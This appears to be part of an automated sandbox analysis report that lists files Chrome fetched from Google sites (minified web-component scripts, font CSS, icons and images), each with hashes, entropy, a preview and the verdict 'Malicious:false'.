                                                                                                                                                                                                                                                                                          Preview:import{i as p,s as u,x as b}from"./ycaG4YXp.min.js";import{e as m}from"./0XPwTFcg.min.js";import{e as g}from"./p9kcPq91.min.js";var h=Object.defineProperty,c=Object.getOwnPropertyDescriptor,a=(n,t,s,o)=>{for(var e=o>1?void 0:o?c(t,s):t,l=n.length-1,i;l>=0;l--)(i=n[l])&&(e=(o?i(t,s,e):i(e))||e);return o&&e&&h(t,s,e),e};let r=class extends u{toggle(){document.querySelector("hsw-mobile-nav").toggle()}render(){return b`. <hsw-button. icon="menu". class="hamburger". size="md". icon-position="end". label="Toggle menu". @click=${()=>this.toggle()}. transparent. ></hsw-button>. `}};r.styles=p`. hsw-button {. --hsw-button-color: #5f6368;. }.. hsw-button::part(button) {. margin-inline-start: -12px;. height: 34px;. width: 34px;. }. `;a([g({passive:!0})],r.prototype,"toggle",1);r=a([m("hsw-mobile-nav-button")],r);.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1166
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.691960667496785
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:zeB8UKUcXK2ikTRek1c4ZiE6VV6B0KbGeT2:zeNWXK/GRx24ZiEkV6BrRT2
                                                                                                                                                                                                                                                                                          MD5:08B76701BB5EF4B5FB05E05FA3EF33AC
                                                                                                                                                                                                                                                                                          SHA1:10DBA471BC3E4AA376256FE00BA6C8A4AFBDAB1B
                                                                                                                                                                                                                                                                                          SHA-256:FFF7FFB81126FC736AF24F8797F397C29F65C088DA60E87CD1241834E19D6274
                                                                                                                                                                                                                                                                                          SHA-512:C4B3B7A6965F15BDD4A05B4DB24C25FC91877C174A29A70FF7B9BAD9556A8B7F730F33F90926FC89E6F951F171C6BA2B86D1FC090E60F4297415ECF8D16E18E2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/tvQvvubDZ2r6Ou8zxkVzkIvddC1snCCq4xD4dhafjAJhHLDsEvHDEUms9RyVH_g-nI_8yTyeahZshZqwMV0NdHxD-K9v-Zbm4DF2vds=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....EIDATx....k\U.....L.@lC.D.)..-...._.A..R..n.nU.U.........J.Q.*.]l...6..B4H..f.... ...{.9.....&.3.|I.......T.........'.?W..V...q.a.-..>N?.......;......e.,.........%.9.2...I\v...n.....<'...>MY~..|.mv8...<....>H..G.=z.x..q.%s?.....,{...Q.%/.s.......>....036...r...]'...............v.R..D.x)p..[...zQ-^..G4........~._........#......x)p.j_...~..^..Fm....S...ay_..8<...........7..e^.T..Q.@[....3....qc.....UNU.;q.`..[u=..*......k.q.l......).q.l......).q.l.....k...'.FcO..l.'pw........'..@.g...M.x.o.......rq.........).q.l\<K..,.....F.9 .3......K.7p..kn..d..]%.Y.$..........t.=.X..g)^>.....|.*.~..H...E..?...-.......1.. /..C.e.9..'..,.. +.i(..:S.t.6N..S`...8.6..-...:t..../.u.z.[~x.......-.o.).I.>.../.O.g..8........_.....A..{..p..>P.g.@....C...}~r.....l......).qI,Y.].$..va.......5.8.6N..S`...$.h..._..u...I.......l......).q.,Y...Z[a....[i7...zy.O..Av}~ .)..:.......Q}b..5.8.6N..S`...8.6N..S`...8.6N..S`...8
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 686
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):384
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.3873604838406495
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:XtP2c7s5q+e6ZPCNP59HUymZLShVnPs+07KB0w8OmcftOYY4NHkjR:XRNsQ+x2wyIO3Ps+uKBsOmcVOuE9
                                                                                                                                                                                                                                                                                          MD5:628C9C2D9E304C32D6F33C787275A721
                                                                                                                                                                                                                                                                                          SHA1:561C3899CCC24F89DBE86BE16787E523FEDA5747
                                                                                                                                                                                                                                                                                          SHA-256:1B41860D71EA951D1076D47D415211F9D6533F78E711BBBE8D5F8246C46721A2
                                                                                                                                                                                                                                                                                          SHA-512:A6871065461DCF7A864682A5DA34154598195E856607E4CFABBEDEF610635AEEF247DC0C1E9CDD28C7A8E5A52E0F117CA4E36803AA86F123754FA89980EECEC3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:............M..0....+.p.u...mW.Jh.p...).Jef.[...q.. .....y..q..z;.<...6,..n8....n.ty.......~..X.....x.9._k.O..CU.....b"...<=<^.O.R.......u...h.y......).`n.'_B.0...x...CK..R.r(Y..x.........|.%.4l>.Jk...w~....}.... ..T.so.1f......=..s..kL.."...F......^.P.2..B..I..`#r...R.EK..G+.5........&b...=.G.Km..7.,=....CL...9..Mg$.k.4OH....W..in....s(.2..;==.........ZH+....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1224)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1514
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.27479625067495
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:xlJkpD73UAKkiB/+Gyi/6HbzkS6iq/5XZC5S4QhTE4RuRZwt/9Sp/A/ASJ:6khko5yi6zPG/a5jYHtlSp/A/ASJ
                                                                                                                                                                                                                                                                                          MD5:26F8B3C27C55272C775E579F80E837EA
                                                                                                                                                                                                                                                                                          SHA1:15986AAF8F8E37C933C9C707837C340A5882CE4F
                                                                                                                                                                                                                                                                                          SHA-256:DAED081E0609DFDCD09174CC8C89BB5CEBF670A7600D9C0C168BCA3E63016F1D
                                                                                                                                                                                                                                                                                          SHA-512:70A2F351C98832889BD4A8DD01EE6D233D17273398E0D88BBBA16D78F867C28D8B9F6A7A48A87C6F9E19738F20654ACC53930200F8644F47222C88253867DAFE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/hIvGK13F.min.js
                                                                                                                                                                                                                                                                                          Preview:import{r as p,s as d,x as c}from"./ycaG4YXp.min.js";import{e as u}from"./0XPwTFcg.min.js";import{n as f}from"./IYoTYjYE.min.js";import{t as h}from"./ianzD0dL.min.js";import{i as b}from"./IFunn9hk.min.js";const g=":host{display:flex;height:auto;scroll-snap-align:var(--bds-carousel-scroll-snap-align);scroll-snap-type:x mandatory}.container{box-sizing:border-box;width:var(--bds-carousel-slide-width)}";var v=Object.defineProperty,m=Object.getOwnPropertyDescriptor,a=(e,s,t,o)=>{for(var i=o>1?void 0:o?m(s,t):s,l=e.length-1,n;l>=0;l--)(n=e[l])&&(i=(o?n(s,t,i):n(i))||i);return o&&i&&v(s,t,i),i};let r=class extends d{constructor(){super(...arguments),this.role="listitem",this._width=0,this._height=0}get width(){return this.container?.offsetWidth}get height(){return this.container?.offsetHeight}attributeChangedCallback(e,s,t){if(super.attributeChangedCallback(e,s,t),e==="visible"){const o=t==="";this.updateVideoStates(o)}}updateVideoStates(e){this.querySelectorAll("video").forEach(t=>{e?t.play()
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):24755
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.560903892728794
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:/TyAq7YPyvqwxYfUH2QiScPeD4CdFFwmBYHAaCiP:byayxGUHNiScmD4EFFwOYHBCiP
                                                                                                                                                                                                                                                                                          MD5:D0EE6699A22453D298C9E856DA68F9EE
                                                                                                                                                                                                                                                                                          SHA1:198B363D0D29F3936095857C98338C7CCC8F4DB3
                                                                                                                                                                                                                                                                                          SHA-256:E51E7E0A7297C11DB7054DD8598FF82BC5C60DEBF7B1E19D90D1887900ED5135
                                                                                                                                                                                                                                                                                          SHA-512:40DF0769CB928AE1ABC6D328B030CA9B03451CAE1C736FBD008387C0276C0E908168AA0CE1332E079C2470DE856A0C9A7419F84E225D5224C03E01BDCD2512F4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://fonts.googleapis.com/css?family=Google+Sans:300,400,500|Roboto:300,400,500,600"
                                                                                                                                                                                                                                                                                          Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* armenian */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiIUvaYr.woff2) format('woff2');. unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;.}./* bengali */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiAUvaYr.woff2) format('woff2');. unicode-range: U+0951-0952, U+0964-0965, U+0980-09FE, U+1CD0, U+1CD2, U+1CD5-1CD6, U+1CD8, U+1CE1, U+1CEA, U+1CED, U+1CF2, U+1CF5-1CF7, U+200C-200D, U+20B9, U+25CC, U+A8F1;.}./* cyrillic-ext */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_I
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):842
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.561503064205602
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:t4jSvemRbTTZ/S+h0AGTDL7iK+/vZ81tvh6RSu:hXVZ/t0vB+/WbvARP
                                                                                                                                                                                                                                                                                          MD5:00ACBD846E3E89D4B9E06E70C3F1F961
                                                                                                                                                                                                                                                                                          SHA1:C944F19A957800D8DF262850A7B2724D946A456B
                                                                                                                                                                                                                                                                                          SHA-256:36007D3F191AA0ADD72C7F6EA749B75545AD5D12E793AB760F31675F2E6EB480
                                                                                                                                                                                                                                                                                          SHA-512:C17719B3C4BF849A840AA22D34F2B85EB3D496EC9A98C985AE4748E1354C79177435FCCB81C9E01E77068A62605377C9C149C26A5AB3E096BF8D449204B36EB0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" enable-background="new 0 0 24 24" height="24px" viewBox="0 0 24 24" width="24px" fill="#000000"><rect fill="none" height="24" width="24"/><path d="M12.87,11.81c-0.23-0.38-0.37-0.83-0.37-1.31C12.5,9.12,13.62,8,15,8l1,0c1.51,0,2-1,2-1s0.55,6-3,6 c-0.49,0-0.94-0.14-1.32-0.38c-0.24,0.64-0.59,1.76-0.76,2.96c1.26,0.22,2.28,0.89,2.77,1.77c1.69-1.17,2.81-3.13,2.81-5.35h3 c0,5.24-4.26,9.5-9.5,9.5S2.5,17.24,2.5,12S6.76,2.5,12,2.5V0l4,4l-4,4V5.5c-3.58,0-6.5,2.92-6.5,6.5c0,2.21,1.11,4.17,2.81,5.35 c0.51-0.92,1.63-1.62,2.98-1.8c-0.09-0.69-0.26-1.42-0.49-2.03C10.45,13.82,10,14,9.5,14c-1.1,0-2-0.9-2-2v-0.99 c0-0.56-0.19-1.09-0.5-1.51c0,0,4.45-0.23,4.5,2.5c0,0.29-0.06,0.56-0.17,0.8C10.91,12.48,10.47,12.2,10,12 c0.58,0.43,1.37,1.37,2,2.6c0.67-1.62,1.68-3.27,3-4.6C14.24,10.52,13.53,11.12,12.87,11.81z"/></svg>
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (768)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1425
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.369730450294109
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:kWfSIi01lHbcYmfNUgG/Rt3Fhe9kuKfKXvWWVqpOUcJIUGbpxGbJ8OOHQLz9Trky:ZfSN0/4gfhQofaWHxcGUGbpxGbO8ZTrx
                                                                                                                                                                                                                                                                                          MD5:33CEBB03C13AE52E6A8B3EBEE28706BF
                                                                                                                                                                                                                                                                                          SHA1:58C87F2AD7CFF41F1A2003B7A4F36882A16E6965
                                                                                                                                                                                                                                                                                          SHA-256:2C8F42EDFAD6B9734A8E4CDFE96BFB321120BF75B15CAC9EE2EBDD37D593CA4B
                                                                                                                                                                                                                                                                                          SHA-512:9C55135B514001C7A567AD5FA9DB0E63FA8FB24DA0C665DDFDC8D7AB513AA7B30980A27E684AA334E9588084FAD91E73919F51BA73A04A7D84C38283098B1315
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.eh1Y-00lhsg.es5.O/ck=boq-one-google.OneGoogleWidgetUi.hnwCoQrxzwQ.L.B1.O/am=IEAwYGw/d=1/exm=A1yn5d,A7fCU,BVgquf,EEDORb,EFQ78c,GkRiKb,IZT63,JNoxi,KUM7Z,L1AAkb,LEikZe,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,PrPYRd,QIhFr,RMhBfe,RqjULd,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,e5qFLc,ebZ3mb,fKUV3e,gychg,hKSk3e,hc6Ubd,kWgXee,kjKdXe,lazG7b,lsjVmc,lwddkf,mI3LFb,mdR7q,n73qwf,ovKuLd,pjICDe,pw70Gc,s39S4,w9hDv,wmnU7d,ws9Tlc,xQtZb,xUdipf,yDVVkb,yYB61,zbML3c,zr1jrb/excm=_b,_tp,calloutview/ed=1/wt=2/ujg=1/rs=AM-SdHtG5mpbAvjw6lx2uzOrYGtSsP2slQ/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;wR5FRb:O1Gjze;xqZiqf:wmnU7d;yxTchf:KUM7Z;zxnPse:GkRiKb/m=P6sQOc"
                                                                                                                                                                                                                                                                                          Preview:"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{._.q("P6sQOc");.var xpa=!!(_.ni[0]>>26&1);var ypa=function(a,b,c,d,e){this.o=a;this.N=b;this.v=c;this.O=d;this.ha=e;this.j=0;this.l=OY(this)},zpa=function(a){var b={};_.Ea(a.Nq(),function(e){b[e]=!0});var c=a.Fq(),d=a.Hq();return new ypa(a.Gq(),c.j()*1E3,a.Aq(),d.j()*1E3,b)},OY=function(a){return Math.random()*Math.min(a.N*Math.pow(a.v,a.j),a.O)},PY=function(a,b){return a.j>=a.o?!1:b!=null?!!a.ha[b]:!0};var QY=function(a){_.S.call(this,a.oa);this.l=a.service.bs;this.o=a.service.metadata;a=a.service.hE;this.fetch=a.fetch.bind(a)};_.G(QY,_.S);QY.W=function(){return{service:{bs:_.MY,metadata:_.IY,hE:_.GW}}};QY.prototype.j=function(a,b){if(this.o.getType(a.wb())!==1)return _.hp(a);var c=this.l.Ir;(c=c?zpa(c):null)&&PY(c)?(b=RY(this,a,b,c),a=new _.gp(a,b,2)):a=_.hp(a);return a};.var RY=function(a,b,c,d){return c.then(function(e){return e},function(e){if(xpa)if(e instanceof _.Bf){
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):676328
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.1830637730488045
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:d69uT/7mT7p5pHGKeTF7/xB+sBIgJq0Xt6Yl7mLohCIFVw:d6w7AN5BGhTF7xB+vCRFgTM
                                                                                                                                                                                                                                                                                          MD5:E43BD53BE90D9FAD3ACADEC0F2E1EBB5
                                                                                                                                                                                                                                                                                          SHA1:B8ADBC0300C44E9CE4939995A655722CD95C1138
                                                                                                                                                                                                                                                                                          SHA-256:ED9DF024A58D11B9B18814FA20375A4F9CA8A0F5B4441991245CE417B2AD4671
                                                                                                                                                                                                                                                                                          SHA-512:C91CC027B87A5936CDEE8277A2D9A2D94D4F5E9AE235C678BCDA9D1F994B0844A44E0B04ADDFDCEDD7D6EFC04BB130924C3277E8899A015CBAA09A51AE400771
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF.Q..WEBPVP8L.Q../..D..u!...R...?..?.D...C(dZ......j...kkO#.....c..x ..g...NC.t....p..#....j..'.$I.g..f...C.XV=...=.!.m;.:(..H@.....A%.(.:H.|.....<....2b.H.,3...........W{..*..E.HKrB.*.i;L"u.}.e..Yd.c.*.L.ok6eV7...,....g.D..n.EYn.....Z.m..P.L;....I..*.U.....?@.b[..:G.d.%I....f.L.Y..L...........fv..k....}........fBl.b.ghiB9h..9M.c..}.u.{.{..7.-.T.Cy.%......."....~_>....?;.=...;H{0..IeMj.X...m...T.......`..6.....<"^...m..u.EQbI.l..v..{...D..n.1+...'36`%........i.@...........l.,FB..&.Y.".8i.c.F....$...aI..k)Z.........J..S.....m'.6...1.....r..f....k.c.j..\[...13.F.,.C.H.......[E..V.!.o.B.-.2..!.A..h..R....}.y<p..................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2018
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.567869290702255
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:gK9jv5RQ6SWRW631PSDHcpS6VnTMxSx/kjfooEH2bd:gK9rc6Sk5X2xShsT62bd
                                                                                                                                                                                                                                                                                          MD5:9B282D6F7D4EF76BD33E3BD8AD6F944C
                                                                                                                                                                                                                                                                                          SHA1:A05D234D5265BBE63CBEEFBCC584D288D036FDFE
                                                                                                                                                                                                                                                                                          SHA-256:3DCE4B1E1B0FD56F0552E03CEA8404EBDBF0A42534834255A2E85D0FC16E62F4
                                                                                                                                                                                                                                                                                          SHA-512:3409ECDB91502306A7A5E49CA3D66B632A7407A06A18C1F1D88236FF220C28C258F09CF4725426673A27E643D008C2EA51B10ED6BBCC318287BEAC649848F873
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/WVR82wo80fHsNaPFIXDrmwaUcE6lFSxs_zHXc6Bedrglc3MA9mPkDqKFWBMvdVU3RbUEFGd3bYZjLgM21FuTEBGx9MycBQ5Sejajl3w9jgq3o7APtl8=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....IDATx....NU..?/.;$?*e~..%*......L~.Wo...VKkd...[S......h.....$d.....B....sw.s..>.}^...g.;.9..s..|..{.cSPRR...........+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+..+.R..M...;U.tr.O.;..2....`".B..Q..'.._.t.6......4....)..|....Kx...;....Qp...........2..+U..._?.._........$........-.....c.k....`.++.N.....!.w.......T.,...M*C[.r......."..`.pE.k~s.H...(R6..........0.....w..f.P.9x.K.....=eh.."/.F..?..c.o....'h.....R.....]~.0........ ......=...o0...1K..]:7S.\..v.i.;`...ro.6..j.p.Z.SI.y..P...P....X....|M.o...].H.:.../....*x.KWxeA.N2..#./..g.....&0......p3.v...k..6w.k.y...^..{...G.h.....s.......|..^yr...{f...S2..r..n...Z..,....Z...bR#o...1..9.)..h.U.F...W...../ Xj....9W......[]yKB....].mJw.H....Q.{..:Q.y..l..2.G..(...X..t.....rW!#.?.....r.....}..b.!#.dtC(..P.O....W.*w.;W.L/.=.:.{u..t........,v.z.,u.4..#K..4.t...nq.i..W.....##....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):536872
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.371045993798874
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:abSRSMtHhmSmpwVJZkDCq+mqO74MytJ1KrGzyvRhTAUDEEh9ESFN:abDcBmSlrZg+VMsartvR2c9ES
                                                                                                                                                                                                                                                                                          MD5:497F86082FDD888699E9066E26F5D0F7
                                                                                                                                                                                                                                                                                          SHA1:6FB1DDB8C669837799C58C2E53632DB4252BA27D
                                                                                                                                                                                                                                                                                          SHA-256:88B71E87F8CEF9813E2833FD5071ECBB828860C365BD1E084F665EFE00463143
                                                                                                                                                                                                                                                                                          SHA-512:C66720EACFB28E2F3A0939B3BA6E48E83770169C8C58206D0904558BC4315313A5ED377C9DFD875AB95E8F896A078701BF8D8523985C8DCB78BE1BB71F6CC79F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/ZRyB3x_HY1IUsygqV_W2IoW3vhFGiqLKJc2RZVndWfTq5x7PoLzgpP0clM5xFWSh8zIL0Ha3-OI2KbDLKdKob_qjKo10ICrcFWRaPA=rw-e365-w2880
                                                                                                                                                                                                                                                                                          Preview:RIFF 1..WEBPVP8L.1../..D..u!...R.....Y.P....]m.\..H........<..|.....m.i..W.d..)>`[.v.bP.L......:...L.\h..6t..N.....R....9..3.a.t.v)..n..%M. ..!..8...G..B...e.~:~....~..........m{~7qu...[EeI.Hr.L......L.'.&.v.........{..)G.HeJ...I.L.......H2..$Yk......m[.....~...%..X......$.X..Dn.....N........F...{....v.$Of#7Iq.!.Z...K........{..mk..j.o..@.(.Yre.....1.........d.mL........l.n:M.Iz@..G..H...M..Y!f....Sp.dg...~.....=9r..S-...+@.?T....E..).d.V...O....%....{gB.#I...6......Fn.~.@. .F."DA.-X....u(.tJ..s..s..s..qs.9.].*......J.t9.F.y1..@.D.$B..s......gN_....m.......D.R;.s...68Z;....;..../.......ca..8N.(..27.e.......;m.|..9I..*t........2......6w..ASy.Uigu..v.5...............:.....g.2...x.+.!.@..4.......K....w.qz..4K....J]...W...N..y\A..G[9V..'........r..Q.")...!..\...3.'.........z....{...{..+.......s....$..%...G]..;k.#=.[...m........<<tG.CI....c.#.....h$0..1<1K.<.om..M...>.3.%1.....&..o.....)06{...L...-.6G.^....J<...`f...Qr.cf&..I...s9..%hvVKS.`.b
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1058
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.601570405857222
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:6v/76mx3ysRgWwZT+1WV71HzFlrGnHQbpY6ziKyLYsuaa1v3AWbqVrr5ehLfqwFb:KBzgWwSEJinHsY6zpj1/iMZfT
                                                                                                                                                                                                                                                                                          MD5:E1F4F05BDBFD1A5F3BB4F2E371B29219
                                                                                                                                                                                                                                                                                          SHA1:C703DAFE08C390E3ADCE5BFCF9028DD6361BE32D
                                                                                                                                                                                                                                                                                          SHA-256:7AC05A958E8FF05646E10709BD36911C6C9554E0245941D5207F9EF4768EE1A0
                                                                                                                                                                                                                                                                                          SHA-512:8A3BA979BE45494EB3B79CAD43F63F5E75B75A1A1B25FDC5AB84919F3667D455862DFA29FE21B709A1E89CEF289345EF67E38396D1DB1F4D638A4C6003241667
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx...O.A......w....X.E.4j..0..km......Y..WY.K;[.-T.j,.P4..D..1....{;..H,..7;o..Ob;;.o..... """"q.....?.....K..%.9._?.~/.Z....r...E..#.:...g...u..sX_[....p.9<...r.b.F3=.8...........\8.{7.....l..c...6&[C.7.....f:.....J....HO.x`..^S...}.dk0.Fv#...X.5....\."[{O...........O....2..^.,G.......^.,O....a....8.......}.b...^...h....'......}.b...:x1p...^..O......|.b....^.....d..}..........\.^....j..........J.j.....2.<*.>T{...!...xG........l......1.q.l......1.q.l.......Yt;.:i.]t.T.N*....N....F..:Y...N).^......l;.O............|.....J.U.&9.l...I.^.j..l$......?V.T.{....=k|\..nT..g..-./BU6.......Rx..H..Ib`...8.6...S9E.P..-.P....P..wpQ....Ye`........m;Z..l$........BY...<....C.$1.q.l........5..6z.^_......+e....Ddu....>.` ..w..."R...0.q*.k=z+"uC....j..z.\[...Z.....sB<...<.....Lr..8.6...c`...8.6...c`...8.6...c`...8.6...c`...8.6...c`...8.6.@`.B~.....=.....{ .....h.......a............_..,........p....#..C.o..O...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x395, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):29309
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.953051353001186
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:xteKqQihRMizDN+aRyNXC8xOMVpnddiuOrz:xte5RM7PfBK
                                                                                                                                                                                                                                                                                          MD5:6A3AA3B64DC6D5B7D8C44BDCB0018753
                                                                                                                                                                                                                                                                                          SHA1:45DB7AA420AD87D0A2CACDAF0F42290F658C8E3B
                                                                                                                                                                                                                                                                                          SHA-256:19F91128AF78185C80A6D17DC483785402992D2C666FF6CCCA04DB8530308160
                                                                                                                                                                                                                                                                                          SHA-512:7A344EB2EF7915758951AA2855DB27DBA68151703A166F2B4857591F400110DF05621E4606BBAA81907CD48944FDF18D92483E75AD36FC1E0BD02CABDC432623
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF...........................................................................................................................................................".........................................e..........................!1...2AQRaq.."......5BSTUbru.............#346s.....%Ct..&.$c....'DEVd....................................C.........................!1Q..ARaq......2S...."3r.#4B....b$c..Cs.............?........" ...""...." ...""...." ...""...." ...""...." ...""...." ...""..../...=E@.....DD....D@...DD....D@...DD....D@...DD....D@...DD....D@.....}.6.F.h.$U..7..c...s...W..DU..3.....U.. .P.W...~...5.....FP....!..u.;......h....T.@...r.R...p..tk..*.%.D[%.k.a:.*.E.#!n.GrOQ^o.....u.,A..\%..l....2}.....xv-.C.(-.d.)....<+.jw7X..c....D@...DD....D@...DD....D@.}..:.>..n...{.......q.a......a.o9.=.$*Qe>..'I.G...P....t..y{...TQ...".X..}"...Ta..ts.^..Sg.su.s.u........].nl%.Wk...e,...8u}..n,.....<..}..<..$....@..2.e+....^...S@.z..[%.......=......\./)..c......~..#{.qp..Q.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
